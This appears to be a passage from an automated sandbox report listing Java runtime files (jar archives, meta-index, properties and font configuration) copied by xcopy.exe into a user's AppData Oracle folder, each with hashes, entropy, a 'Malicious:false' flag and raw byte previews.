                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/......PK..............PK.........p.V................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u........Y.*h..%&.*8.....%...k.r.r..PK......D...E...PK.........n.V............2...sun/net/spi/nameservice/dns/DNSNameService$1.class.S]O.A.=......./@."e.,(>AH.` )..g.......l.O...7.+0.5>.}.7.....U.k..{f.=g.....'.K.....q..C7n.P...;9B.-.-8.J.V......#....nd..n.p..=_,3t.}....f.a.\%..6......nJO.5....j......V..f.a..?..].<f..5.._.JT..=.w.5.....Tq&....R....3.>v7.^...G.l.V.....F.0..<.D..@......K.>.:......y....+n"M.O..s....4..#-...uQk..yq\...*y.U.H{..9......cSy~.R..a........l...%.}X.p..=,1L.S.. .h.....`o+%....P...?..0.awh.m..m1....$..._...N...uav.a#.\..t....M.......p..B3..y....~.:W..>./:.2n.....gH......4I.....C?...i....wJ.`..)R.{...DN(vQ..Q.i..Eo)..[.> S.}A.5......ZI%.Ad(>'+/H.%a.0L.Y....#....U.._..W.....f.w.:...O.U......K.8&.....z.......PK..*...u.......PK.........n.V............2...sun/net/spi/nameservice/dns/DNSNameService$2.class

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\jaccess.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44517
                                                                                                                                                                                                                                  Entropy (8bit):7.9042816672520235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8YVmk7qfgKbWnXuZgQvfPTJrJoctkZQnWn109rq7mjE4y:8Kmk7WgfnXu5frTovQnWn10NqO3y
                                                                                                                                                                                                                                  MD5:C52FDCB96D827AC8B4182EB4A3294A0F
                                                                                                                                                                                                                                  SHA1:EBB110F771F622FF37C16C9FC803CFE1988EEF9F
                                                                                                                                                                                                                                  SHA-256:CE2FFFD81EAE0A0DB45915DDC56B9F53AF709843773074AC57BA7C6615BDE1B0
                                                                                                                                                                                                                                  SHA-512:CEAF3459A1DCCAC97EF8D6FC631FAAAB4845FFA1895779C254350BCD626B89E4E3E58A4EFA877B128EB85EDD11405D9C6B5C29A2F2132C4C285636ACA2B2F43B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/......PK..............PK.........p.V................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u........Y.*h..%&.*8.....%...k.r.r..PK......D...E...PK.........n.V............Z...com/sun/java/accessibility/util/AccessibilityEventMonitor$AccessibilityEventListener.class.Wkp.........5..5..A6`l..C\j.A...eb)..)dm....J+..h...I.&&...L.4.3.$.aH.q.....M...i..m......KNf4.y..~.9g.>.....[p.:....n..p....(........#.D'".ta/.>.D7.|.s.!..f.o......#\w?o...;q..]x....B...~.....t..4>?.#N.1$Aw........;..#j.HJ0%..p...M.5...V[.. ...*......P...).qZ)......a-i...H2.EM..H.2l.H.eX_.>..(..J_..Lj.Z\3G...,...C|.....T..$,.q.OX...[.u..Qg..6..:...iz.q.-.*...:sD@9j.2[..w..I3a.r....cXM..m..}P..J.WU.d`o.nhD.3.=).)..o2..F*...8^k...f)t.........G...e|.....C*K."#.F...,.m.q..I8)....$..x^......e..?..c.D..8..e..7...U..8..dl...rc.s.7d..3...x.....E`.....n/.8.qY......i.~BQ..\.1.K2~.K...s.C.YN...@.Lh...i....PwwW.W...2.z....<%..F..+..xW.e...K.W0...3......J..)S

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\jfxrt.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18227164
                                                                                                                                                                                                                                  Entropy (8bit):5.970897504950222
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:qHkpSphO6GWdvHPWL9rkSqyM7IubKyv86E5Pl2pfIAGRbBlCNyzI5bCJma5PdEJE:qlVGsUASqOubKymFJLoI8osv4uAnHp
                                                                                                                                                                                                                                  MD5:9BB44D7704D64120416AA7110DE042A8
                                                                                                                                                                                                                                  SHA1:AF6330BA6981565251B85462FF9CF2BBD621AE6E
                                                                                                                                                                                                                                  SHA-256:88FEC8CBB84DF53D64F2F0B6DADF3D631E88A4AB42D675681612C9B66378F4C8
                                                                                                                                                                                                                                  SHA-512:2A2EF4C3FCD4E3D01519CF2028854B3F00781EC06481A11294A37C2799EEDA87C1B593C0D1C3C8DBE3956BF05123FDB4D6FFF33942370F22DBBFA06619C80DCB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK...........V................META-INF/....PK...........V@...i...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.5..Created-By: 1.8.0_261-b12 (Oracle Corporation)....PK...........V................com/PK...........V................com/sun/PK...........V................com/sun/deploy/PK...........V................com/sun/deploy/uitoolkit/PK...........V................com/sun/deploy/uitoolkit/impl/PK...........V............!...com/sun/deploy/uitoolkit/impl/fx/PK...........V............$...com/sun/deploy/uitoolkit/impl/fx/ui/PK...........V................com/sun/deploy/uitoolkit/impl/fx/ui/resources/PK...........V............4...com/sun/deploy/uitoolkit/impl/fx/ui/resources/image/PK...........V................com/sun/glass/PK...........V................com/sun/glass/events/PK...........V................com/sun/glass/ui/PK...........V................com/sun/glass/ui/delegate/PK...........V................com/sun/glass/ui/win/PK...........V................com/

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\localedata.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2207001
                                                                                                                                                                                                                                  Entropy (8bit):6.724283785186481
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:XAAaw4ejiUAJit3eOfeownKu9nftV+SAy:iw4eji9itutnHAy
                                                                                                                                                                                                                                  MD5:1ACD4D02F968B06FB7DCDFC7291961ED
                                                                                                                                                                                                                                  SHA1:F68EB01016034C2FF51533963DEEE1C75F922C3D
                                                                                                                                                                                                                                  SHA-256:DC30DC10C2ACECE3B92AD1B636F51FA7C571CBEF35180265746074D059F45135
                                                                                                                                                                                                                                  SHA-512:A4884FF83C3D99E972CBFC82D0C76C51848C30DCF1C04C8B7D33B15B876B7E9FA9CC7E93F00C3728A61E9216AE26C3D922F1AED9E0B5D23EAB0DD15A6DCC8DB4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_291 (Oracle Corporation)....PK.........n.Vv.^.........,...sun/text/resources/ar/CollationData_ar.class.......4..........J& . = .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .= .& 0 < . < .& 1 < . < .& 2 < . < .& 3 < . < .& 4 < . < .& 5 < . < .& 6 < . < .& 7 < . < .& 8 < . < .& 9 < . < .& . < .< .< .< .< .< .< .& Z < .; .; .; .; .; .< .< .< .< .= .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .; .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .< .

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\meta-index

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1511
                                                                                                                                                                                                                                  Entropy (8bit):5.142622776492157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                                                                                                                                                                                                                  MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                                                                                                                                                                                                                  SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                                                                                                                                                                                                                  SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                                                                                                                                                                                                                  SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\nashorn.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2035055
                                                                                                                                                                                                                                  Entropy (8bit):7.931988689505804
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:Eaoqk6DxnvxCsjj0QTHc/g2lv9XjalW996mrMZGA2O:EaoMVvrj9Tkg2pVWlMzMZh
                                                                                                                                                                                                                                  MD5:E65962BB555222712C678271E32F9E66
                                                                                                                                                                                                                                  SHA1:41D44D53A8F0E31E4ADF0F8AD7B47B82F253B581
                                                                                                                                                                                                                                  SHA-256:BB7BC9C48FE772B06F8642B7FE9594B66B42B780E2CC323A08261E9B3F5559DA
                                                                                                                                                                                                                                  SHA-512:6EB464F0191906A48322886082240FCDA204439EA5D50102522C5054017A0C341004934D96981E3DE67F04B38335CA5D8BAA3423C6CDD5B6403BD4DB5E5C5078
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........{o.V................META-INF/......PK..............PK........{o.V................META-INF/MANIFEST.MFm....0.E.&...:...BG...A.j.....G.........s.....(/.!.E.R.J......7...)2.:z.[.%..<._sV.q...........S...uj.Z.8....H.@...-v....6......z6..D.?.p:....y&oi.....PK....x........PK........vo.V............6...jdk/internal/dynalink/beans/AbstractJavaLinker$1.class.S.N.Q..N[.mY.".....T......7.%....A...t..n..m........k51.....2..H.51....o..|..9?~~;....9..J.Y.g...5......M%.4......z....=..v.OF"..7.#....-.e......nU...G^ K.a/.BF.....y.....*C.C.^..!.R.eH.....j....aK.M...3].....=..;'.;]j*..>C....#*.:..Z.(.N...JvEX.I.e..A..."j...C....t.C.q..:..>.J1}...z`..v...[.. .QTa..kXeX..'.1O.c..1...x..W..a.....3.Gl.VG8.C.tE5P...rN.&.v.....F.V.{.say.0^~m.....e....VW.B..x.h..u.i.K..F..j.[;;..Z.z.^f.8.q~.nR.n....Q.2..$.)B.$..|.;.....'.&. .j|@.E....FP#....A-..."...b.n.".H/c..Ho..s.I./.X..p...}..]F....SP.L.u."@..$o.9.b.'.!.;X~6..PK..]./.<...H...PK........vo.V............K...jdk/interna

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunec.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47302
                                                                                                                                                                                                                                  Entropy (8bit):7.9145298971475
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:4731B13B5aguVlb2TUVMbLjwP7l6lxiHsWhoc2toqMmrV3lkwhEafSkjmPX+M6ij:2/7ggIYU6GlQ0Hnhoc2mvA3ewSafSZPd
                                                                                                                                                                                                                                  MD5:1227482C65DC231E3607B002950F5497
                                                                                                                                                                                                                                  SHA1:709FF3738D5DA8DB225818DF2966F04C13CB7D02
                                                                                                                                                                                                                                  SHA-256:CFE84C5292F9DDEF96FECF118377565BBAF769EEE7FF4CCA81652FE1134F9809
                                                                                                                                                                                                                                  SHA-512:87C4F5FA1E6DAD6F2FAB8A0371380FA7BE9F63B05F8FF6740A4208EC115F8DB9C512DE9E40B4B853BE35EFFED2804D0774C0E9426571A129CB6BDECD527CDB8C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........=bU................META-INF/MANIFEST.MF..K..J....Q..E-f...y..1.D@."*...<.M........S..w...w..?.d......W.T5...d.F<?)Y....&h./_w.I..D..`b........U.>.>.....F.A...m.".....(......L..*..._,......(......b?.g.A..U6.-e.S...7.}$.j........-.........._..G.{..|:......Y..rG.......5.5...6.."\..[~]..q......EiP.w...%..u..w..'.......I.Y7pukE.+.r.\..p..c.aB..g.Y..5.U.g.5......6A...#......g.6.9.|.W...ztTZ.>.e..(k./....q.x{.M/...\6.Yviq.... .)#",..&......G...40...|.i.&2.9.......Y.t..2D.gn..\..Q....1..L...1.3..k...f....?..m....H..Q\....j...]T......D.`.9.0w./`..f;S.t...`&o.`...-<..i+.r.L.s.|....Py...../...!........Jg[.C.U...w7?.n.v3..iv.f.7.0.;...M.`.a.Y.xCR..G.....|.........T|...P.b8.3...s.0.....2!.......2Srt.`..K.v...I.....=......]q..].4.y.h.|F.$=..3..;.......ayx.6.N.4g].tZ..G.m.(.!..t=...V/...MK2....].Rj....d...=T.u....0..{.}..:.*)["G!...X....[....1.j..F_T$..E+..R...:....J.....n.?...v..?...l.....`.!Xe..6MJ..dI..j.X;Z......V2@.;.Wc<...l.5...%...N.a

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunjce_provider.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):294661
                                                                                                                                                                                                                                  Entropy (8bit):7.902957816161981
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:5lQ8GTsacebwePne9NuAZ9ObVT/slrNoCawdxpFfGi8+jBuTW:5bAPce0l9NuAZwlsl1dP86B0W
                                                                                                                                                                                                                                  MD5:456031723EBC7270D9BC3747CDD6DAA2
                                                                                                                                                                                                                                  SHA1:A4A61BB10AC83F201854A11750AA86E7DC8DA41B
                                                                                                                                                                                                                                  SHA-256:324499CEDD3F19EA621A38F42834369D7DA8BDF40FCB5A345007BFA2E5987780
                                                                                                                                                                                                                                  SHA-512:B425EABD590F905AA147720AA507A0DA2B31199956F21137A722FE6C8DE05549D1CDDBB2FB2EA1CBE34E39CE9D0EABB0502DD2A9A09F72DD87CD002765537079
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........n.mU................META-INF/MANIFEST.MF..G..F.......Zh.^ f..D...a.K8..(.=@8....l.Hj..{!........'Of..ve.N.t........Cn.M...._..).&.......`-.\.....Q.}..C.}../.......?.a......OtI?...c..&....{?..O..e_>./9...q..{Z.?~..M8g..........?.qz.i....a.....?<....}....nL.9M..n_.&_v#4.........m.o......_.y..|...j.x..G..#.KJ.1....}?2M../.;n.izY!1.Bp._|....??..J..J.3 ....u...1.({.P..5.........n....B...........0.%....A..\..2.E.,...T&E7rVX.p.='....V...e..v.k...z.R..!.E.....#...Z.......%.!..k"V.!...t....-....N.&M..J.Y..Y.......~g...n...EH.i.....MW.x.]&p...q..*>`.cq..Z\y/....... ....].(*K1\."...8......p...9._.....k..N....a..]...a.U.j......V.zh.....`N....U........e.M..a........S~......Q..3..5.%.m.1..2.r..s..ql.-.....t.........'..Vbo..!W+F.)......%.....b..|`,^2....9..=..FN*#.........9t..JX.K...pez...b........w#.$...Q..m.I..."...l{.v.,A..kn...q..^.i#.N..q.....P#p.8w........l..a5HV...#..;...'C8..x...|Ul..wX..W..... .W...e.b`.=.P[...X......

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunmscapi.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):49456
                                                                                                                                                                                                                                  Entropy (8bit):7.884181045232351
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:cKfrf9FJ546NJ9/JdybTw2EX4iVZ/OcW8R6t+vdZvWc8tv/D2rWYsYuOqMnI6ZDN:cHa2Ehz02mipLXN
                                                                                                                                                                                                                                  MD5:35F7968A28732E702CE7E1074BBC46ED
                                                                                                                                                                                                                                  SHA1:A09992FF24238D7E5925BD2F8DC01EC8A44F78F0
                                                                                                                                                                                                                                  SHA-256:2E42B9055905B163E7FB487845AC80627C9A9A5FDF9DD7C7983C52437E1D3375
                                                                                                                                                                                                                                  SHA-512:F56E1449B7765D031831EB85B85ADA1D0E468BA92E1E0BD48C065EEE7D3C97EF04E1F947773F18B0F6D41994530790AAFAC2EF85289685FE19A795EC62F8BD27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........$lR................META-INF/MANIFEST.MF..........;..{..b. G....(....t.J %...=}...v.*..NC...3.3`.%L@.>.A.......`.?).%..(......6._....v]...<Ie........}.~#1..'..b.......>m.0...P...._l.m.r...W.K.....y.&U]<q...........7aq..t.`|....V.?.5.[p|.oq3..1..??......}....~..=..$..qW.vB.&./.....a... .~y..i....3...E..o...kC..T.Y...-...d...HV!....2..:a....0-........6$.Xv..&0........E....R....c{...;. ....$.6..Mu...n-...TD.R..3.k.Q_G...7..#.0>.^..,.?F.7.*..g......a..g.jz......4Wv.}.M..j..%p..]...}.-v.`.=m7^.'k..Mbz......(3..#R'R.!..<5.>....3Y..j{V=....~...Tf../..R...........=...u...tb...vW...'|N.V.`..s69R7.G...F.....)....g..&.2..N...~....n.=......6....t..K..~2 .....d.W!.9?.Y..)..d....V.-....b..`.z.......h1...r..e(#.c...gT.....Q.D.>.Z|..7Q..f$}f.>iD..by.....,...R.Ev.[+.O.~..})....npH..V.nC}H%.R3*]d...O....-....>..@..e7..1.-Yq.Y...7.7....%k F..Wj....Z.6.f..d.59.)W...........6T.....V1.t.>z........u<..i.e^t.A{D..{..\.[..N'uY.=7.{..M.e<.tZ>.Z.....

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunpkcs11.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):293990
                                                                                                                                                                                                                                  Entropy (8bit):7.9569881676462195
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:DSjPjNwQ7jFzZLEjlC01sW44iG9qtrkb/V5lacOHW6SeE4b:DSjPGWFFLEJ71sW4G9kkb9OOeEG
                                                                                                                                                                                                                                  MD5:56CF160BC9F76015124FEE50604009B2
                                                                                                                                                                                                                                  SHA1:D9507468AF581CB31D7CCD171D06807487ED240D
                                                                                                                                                                                                                                  SHA-256:67D942B7262ABE5D85E1774B951251E5D1574761BD524B02C2093031D02C979E
                                                                                                                                                                                                                                  SHA-512:58B09C94C15E80FE059E3C28DE90CA90E6BB9E466ABCF82F5EBCA4AC4DBB6205CFD38E1383ED6B39AB6E598C377A77E80F16F5D2150462D57D7B599EEC53EEA3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK...........V................META-INF/MANIFEST.MF.{G..f..]...}.a7....@....x...K.<.=a~...GR.H,.N..B!?...KC..$..........._...U[.U\.....w;...._D...1.z...S?....=....z.._.W.......a.d..O.Q......a.....m.....}{.w!......5L.......?&M_}!t...=../.2.............,......_.......wr....s........................<...q8...m..0...q.R.W.M.tl._a....<O.~....Y.........M.(CM.5..,..P...LG..Z.{~./7....[.a...s..>..a.{+..x..:~..._-!...]...Q.|....~6$.iW.34..dc%....)^.{.....y%.^Y.V.K...*j@...c&yL,.l.../._.%.B..o...1+_....b.:zS$...s..-..k....T$z..C...io.?.e..W..~U.........B...#O..X.a.I..s9o...."....2o...u..ac.%...>A|j...... P..}u.\o.s..;....%.....?b3....c...."^-@2f...;....6....g.=s....a..F...<wL0.Me...9..Bu..3.q~.6.l.,....F...)..u..7...Az... ..:+..w.@...jpR;......I.J.}..........U..WVC..PLA.L....A..m..}B .j.5..].Ew...X.."._z,d....u/=Tz.2T...e.:..;<.G.v............Q...+.....fG...#8n.y.L,...4l.c.*...H.7..Ha..y./..&..m.....B...TW..@A?{GH)3..y....^`.t..WA.l.....09.u'.SB..w..wli.h

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\zipfs.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):70025
                                                                                                                                                                                                                                  Entropy (8bit):7.950153872229724
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:ySElsJBO78JSjr/rG0zzxGU2j38NPrjp/bC:jElsJ078JS/rGVINnU
                                                                                                                                                                                                                                  MD5:EFAC3630C7DC7EC3555BE2CB16306E7D
                                                                                                                                                                                                                                  SHA1:B088CF302EF2BC3CB922597CC0B5DBA343F14CF5
                                                                                                                                                                                                                                  SHA-256:83DD05E11E585A956F1116E95178F791A3AB9D50078029820DE78A61F150742B
                                                                                                                                                                                                                                  SHA-512:BD5E559047BA13B19BF81060B65FD0A423D14867FE14DE292DC5165CD349E27E98C318D9C75CD5D4FD9C935232B473C3772A59B562F80B07C80C4A0EC87CB02A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........qo.V................META-INF/......PK..............PK........qo.V................META-INF/MANIFEST.MF.....@.D....[j.I.0n.."B0...%...}..5..X..`;s83.........Hf1g.n.i2.C.......wX)...G5BO2(.....p5Aj...f.~....,.,..cK.ld..<s...hs...^0_%0...o...Rah...s..._^o9+P.(S...8..PK..Vh#.....M...PK........eo.V............-...com/sun/nio/zipfs/JarFileSystemProvider.class.U]S.U.~NH.a.@..B.\.!.$.U[.X..J..H..G...$,Mv.....z....9...........Z.d..a.1.y...<..s.y...~....x&c......q..B.`B.......'b.4...'e.1%......i!f../aV.L......B,.XD..KX.......V..^..@....`SD..`[.C._0.'..p.2.EF...SV.3t-.&OW.Yn....i....vx..=..]}O.J.Y.2.m..q.Tmc.Z.....H.arW[[I.7.L...F.k.E&...../.z.J...,U. QD...%....v...".+s.-f.....e..3....."..bvu[..b..Ag.<I7U*.^J..j....~.W\.2....i.j..1C7..:..U.QM.UG.d.c`4.8.Pf..MA.E.;0...1.r..bX..$l>h..%..,h.*..."^=m.90]}.T.}'.&...B;m.-.9.\T....x.p.laD.....#..U.r..P..o...(.a.....`.E.....*1..4-......fT......H.*kN..1....r.Z"7.J+d....B5.'U...e.).!...rt...^.p3..k.8.j.:..k5T...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\flavormap.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3928
                                                                                                                                                                                                                                  Entropy (8bit):4.86616891434286
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pTgwOsORUjdjTD6QfxWkVIyiVyV2mjuVwwY:Jgw5TjdjTtpWk6ylV2zwwY
                                                                                                                                                                                                                                  MD5:D8B47B11E300EF3E8BE3E6E50AC6910B
                                                                                                                                                                                                                                  SHA1:2D5ED3B53072B184D67B1A4E26AEC2DF908DDC55
                                                                                                                                                                                                                                  SHA-256:C2748E07B59398CC40CACCCD47FC98A70C562F84067E9272383B45A8DF72A692
                                                                                                                                                                                                                                  SHA-512:8C5F3E1619E8A92B9D9CF5932392B1CB9F77625316B9EEF447E4DCE54836D90951D9EE70FFD765482414DD51B816649F846E40FD07B4FBDD5080C056ADBBAE6F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This properties file is used to initialize the default.# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-.# specific, default mappings between common Win32 Clipboard atoms and platform-.# independent MIME type strings, which will be converted into.# java.awt.datatransfer.DataFlavors..#.# These default mappings may be augmented by specifying the.#.# AWT.DnD.flavorMapFileURL .#.# property in the appropriate awt.properties file. The specified properties URL.# will be loaded into the SystemFlavorMap..#.# The standard format is:.#.# <native>=<MIME type>.#.# <native> should be a string identifier that the native platform will.# recognize as a valid data format. <MIME type> should specify both a MIME.# primary type and a MIME subtype separated by a '/'. The MIME type may include.# parameters, where each parameter is a key/value pair separated by '=', and.# where each parameter to the MIME type is separated by a ';'..#.# Because SystemFlavorMap implements Flavor

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fontconfig.bfc

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3778
                                                                                                                                                                                                                                  Entropy (8bit):4.416740385938501
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iX/WgWWWW81dp83p3j7WOk4BxciETBT5BLrws+LW/Be6J2:iXtWWWW8/e53PNxci8juWW
                                                                                                                                                                                                                                  MD5:AD8365719B70A2DEADE79683D8986A15
                                                                                                                                                                                                                                  SHA1:88CBF37D05F28691B7F82E74FA891792E93B41B9
                                                                                                                                                                                                                                  SHA-256:B2AB990DF3C4C1C2EC4317AAF22C946DF17F0796727DBDA712402307C56558AC
                                                                                                                                                                                                                                  SHA-512:287B19B6996A189BAA3CF2894A57917B14B0615D551C5248AD55860678E5D6E58DD21247799BEBE91B8236FC2F5300399FCFC1BB159EDB9AE8D663805C6A30F1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...&.........:.^.p.........#.a...........6.>.:.-.9.<.=.3./.0.;.4...2.8.1.5.7................................................................................................................................................................................. .!............. .!.................................................................................E.D.J.G.B.H.F.C.@.A.?.I...........................................................................................!.".#.$.%.&.'.(.).*.+.+.+.+.+.K.O.W.`.h.g.Z.Y.f.X.T.^.a.b.c.[.Q.\.R.U.L.S.P.].e.N.V._.d.M.i.l.....t.s.n.}.|.......r.q.~.u.m.y...v.z.x.{.........j.w.k.o.........p.......................................................................................................................................................".......#........... .................#.(.-.2.7.<.A.F.K.P.U.[.a.g.m.s.y.........................................................!.).6.<.I.V.e.l.~.............................&.2.>.H.S.\.h.q.}.............................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\fontconfig.properties.src

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10578
                                                                                                                                                                                                                                  Entropy (8bit):5.1846955343833105
                                                                                                                                                                                                                                  Encrypted:false
